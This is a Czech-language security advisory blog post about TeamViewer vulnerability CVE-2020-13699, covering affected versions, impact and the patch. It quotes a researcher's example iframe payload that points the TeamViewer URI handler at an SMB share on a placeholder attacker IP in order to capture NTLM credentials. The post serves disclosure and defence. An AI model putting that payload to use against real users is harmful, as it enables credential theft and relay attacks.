Vysoce riziková zranitelnost v nástroji TeamViewer může být zneužita k prolomení uživatelských hesel – SecPod Blog

Zář 27, 2021
admin

V nástroji TeamViewer pro Windows byla nalezena vysoce riziková zranitelnost. Je sledována jako „CVE-2020-13699“ se základním skóre CVSS „8,8“, která by mohla být zneužita vzdálenými útočníky k prolomení hesla uživatelů a následně vést k dalšímu zneužití systému.

TeamViewer je softwarová aplikace pro vzdálené ovládání, sdílení plochy, online schůzky, webové konference a přenos souborů mezi počítači vyvinutá německou společností TeamViewer GmbH. TeamViewer je k dispozici pro operační systémy Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8 a BlackBerry. K systému se softwarem TeamViewer je možné přistupovat také pomocí webového prohlížeče.

V poslední době se zvýšilo používání softwarových aplikací pro vzdálené připojení v důsledku nedávné změny kultury práce z domova COVID-19 Pandemic.

(CVE-2020-13699) Podrobnosti o zranitelnosti:

  • CVE-2020-13699 je chyba zabezpečení, která vychází z necitované vyhledávací cesty nebo prvku. Konkrétně je tato zranitelnost způsobena tím, že aplikace správně necituje své vlastní obsluhy URI.
  • Uživatel s nainstalovanou zranitelnou verzí aplikace TeamViewer je podveden a navštíví zákeřně vytvořenou webovou stránku, která tuto zranitelnost zneužije.
  • Podle Jeffreyho Hofmanna, bezpečnostního inženýra ze společnosti Praetorian, který zranitelnost objevil a odhalil: „Útočník může vložit škodlivý iframe do webové stránky s vytvořenou URL (iframe src=’teamviewer10: -play \\attacker-IP\share\fake.tvs‘), který by spustil desktopového klienta TeamViewer pro Windows a donutil jej otevřít vzdálenou sdílenou složku SMB.“
  • Při otevírání sdílené složky SMB provede systém Windows ověření NTLM. Tento požadavek může být předán dál, tj. umožní útočníkovi zachytit ověření a odeslat jej na jiný server, čímž získá možnost provádět operace na vzdáleném serveru s využitím oprávnění ověřovaného uživatele.
  • Úspěšné zneužití této zranitelnosti by mohlo vzdálenému útočníkovi umožnit spuštění programu TeamViewer s libovolnými parametry. Aplikace by mohla být nucena předat požadavek na ověření NTLM do systému útočníka, což by umožnilo offline útoky na duhovou tabulku a pokusy o prolomení hrubou silou.
  • Tyto útoky by mohly vést k dalšímu zneužití díky ukradeným pověřením z úspěšného zneužití zranitelnosti.

Zveřejnění naznačilo, že neexistují žádné důkazy o zneužití této zranitelnosti.

Podle CIS je riziko zneužití vysoké pro vládní instituce a středně velké společnosti. V případě malých podnikatelských subjektů je riziko střední a pro domácí uživatele nízké.

Dopad
Zneužití zranitelností by mohlo vzdáleným útočníkům umožnit získat citlivé pověření nebo převzít plnou kontrolu nad postiženým systémem.

Postižené produkty
TeamViewer Windows Desktop Application před verzí 8.0.0.258861, 9.0.258860, 10.0.258873,11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 a 15.8.3.

Řešení
TeamViewer vydal aktualizaci zabezpečení řešící zranitelnost CVE-2020-13699.

SanerNyní je zveřejněn bezpečnostní obsah pro detekci a zmírnění této zranitelnosti. Důrazně doporučujeme aplikovat aktualizaci zabezpečení podle pokynů v našem zveřejněném článku podpory.

Důrazně doporučujeme aplikovat aktualizaci zabezpečení podle pokynů v našem zveřejněném článku podpory.

Napsat komentář

Vaše e-mailová adresa nebude zveřejněna.